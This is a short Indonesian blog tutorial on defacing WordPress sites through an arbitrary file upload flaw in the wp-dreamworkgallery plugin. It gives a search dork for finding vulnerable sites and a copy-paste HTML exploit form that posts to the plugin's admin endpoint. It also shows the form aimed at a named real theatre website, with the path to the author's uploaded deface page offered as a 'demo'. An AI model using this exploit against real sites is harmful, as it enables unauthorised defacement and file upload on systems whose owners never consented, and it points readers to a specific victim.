Header Ads

Deface dengan Wordpress dreamwork_manage File Upload Vulnerability


Halo Sobat Apakabar? Langsung menuju tutor..

Elu Langsung menuju ke google.


DORKs  "inurl:/wp-content/plugins/wp-dreamworkgallery"

Pilih Salah Satu Website. 

Copas Exploit ini di notepad lalu save ex. html :

<form action="http://www.target.com//wp-admin/admin.php?page=dreamwork_manage" method="POST" enctype="multipart/form-data"> <input type="hidden" name="task" value="drm_add_new_album" /> <input type="hidden" name="album_name" value="Arbitrary File Upload" /> <input type="hidden" name="album_desc" value="Arbitrary File Upload" /> <input type="file" name="album_img" value="" /> <input type="submit" value="Submit" /> </form>

www.target.com di isi sama web target... Contoh ini target gw

<form action="http://theatredumordant.fr//wp-admin/admin.php?page=dreamwork_manage" method="POST" enctype="multipart/form-data"> <input type="hidden" name="task" value="drm_add_new_album" /> <input type="hidden" name="album_name" value="Arbitrary File Upload" /> <input type="hidden" name="album_desc" value="Arbitrary File Upload" /> <input type="file" name="album_img" value="" /> <input type="submit" value="Submit" /> </form>



Kayanya Shell ga bisa di upload di metode ini. jadi langsung aja upload file deface Elu. ex Html. Lalu submit.



Kalo Tampilan nya seperti itu biasanya vuln. Sekarang Cek file yg sudah kita upload tadi. Lihat gambar.. File ane ada di
/wp-content/uploads/dreamwork/480_uploadfolder/big/x.html 

Berarti begini http://theatredumordant.fr/wp-content/uploads/dreamwork/480_uploadfolder/big/x.html 


DEMO :

http://www.theatredumordant.fr/wp-content/plugins/wp-dreamworkgallery/xml/drm_all.xml

No comments:

Silahkan Komentar dengan bahasa yang sopan :)

Powered by Blogger.